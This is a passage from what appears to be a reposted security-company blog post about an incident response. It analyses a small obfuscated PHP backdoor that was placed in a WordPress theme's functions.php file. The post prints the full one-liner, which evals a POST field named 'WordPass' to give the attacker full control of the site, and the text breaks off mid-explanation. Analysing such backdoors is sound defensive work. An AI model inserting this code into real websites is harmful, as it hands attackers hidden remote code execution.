Skip to main content

Posts

Showing posts with the label backdoor

Small One Liner Backdoor

Products Website AntiVirusWebsite FirewallEnterprise SolutionsAgency Solutions Solutions Clean HacksRemove BlacklistStop Hack AttemptsStop DDoS AttackComplete Security 1–888–873–0817 Home Testimonials Company Support  1–888–873–0817  Small One-liner Backdoor 2017-08-21  by  Samuel Odendaal During an incident response investigation, we detected an interesting backdoor that was small but had the potential to give the attacker full access to your website and all its content. Let’s review the backdoor content which was placed into the  wp-content/themes/newaffpower/functions.php file: @$A='Acc';$p='_';$o='P​O';$s='S';$t='T';;@​eval​(${$p.$o.$s.$t}['​WordPass']); The attacker placed the code at the bottom of a legit file and, when called with the required field, could allow the attacker full system access of the website. Let’s work through the malicious code step by step to see how it works and how it enables the attacker to gai